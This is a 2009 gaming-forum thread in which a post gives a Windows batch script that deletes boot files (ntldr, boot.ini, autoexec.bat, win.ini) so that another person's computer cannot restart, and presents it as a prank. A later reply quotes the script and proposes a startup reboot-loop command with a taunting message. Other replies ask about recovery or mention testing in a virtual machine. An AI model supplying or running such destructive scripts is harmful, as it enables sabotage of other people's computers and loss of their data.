Post: How to shut down a computer FOREVER!!
01-15-2009, 01:17 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); How to shut down a computer FOREVER!!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Open up notepad and copy and paste the above ^^. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...


REMEMBER - DO NOT CLICK THIS FILE. (for the noobs)
(adsbygoogle = window.adsbygoogle || []).push({});

The following 5 users say thank you to elsoadfan for this useful post:

LordOfSpoonâ„¢, NoMooreMercy, RedKnight, Sauceappeal, Tuhoaja
12-25-2009, 10:07 PM #83
AgentDragonPig
BLoODz-DrAgOn
does reformatting the computer (making a fresh install of OS) would fix the problem?
12-26-2009, 12:03 AM #84
^ Yep that will fix it.
12-26-2009, 07:06 PM #85
///M
GTghost
Im gonna try this on my Virtual Machine.
12-26-2009, 07:14 PM #86
chasesk8er20
Bounty hunter
Good thing I got a iMac :p
12-27-2009, 07:42 AM #87
Draama
i izz a manwh0re
yeahh this would be messed up. i wouldnt even do this to someone i dont like
12-27-2009, 01:00 PM #88
L0l so you can't even get the boot menu up if you do this shit?!..
12-27-2009, 01:02 PM #89
GQGK
Skillz
Originally posted by elsoadfan View Post
How to shut down a computer FOREVER!!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Open up notepad and copy and paste the above ^^. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...


REMEMBER - DO NOT CLICK THIS FILE. (for the noobs)


Whoa, this is kinda really old school.

You should try this:
Winblows:
    shutdown -r -t 5 -c "You just got pwned"


*nix: (note, you need to be a super user, i.e. root)
    shutdown -r -t 5 "You just got pwned"

Put that in a .bat and call it in every time the computer starts.

Flags explained:

-r = restart
-t = countdown
-c = comment, none under unix

Have fun

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo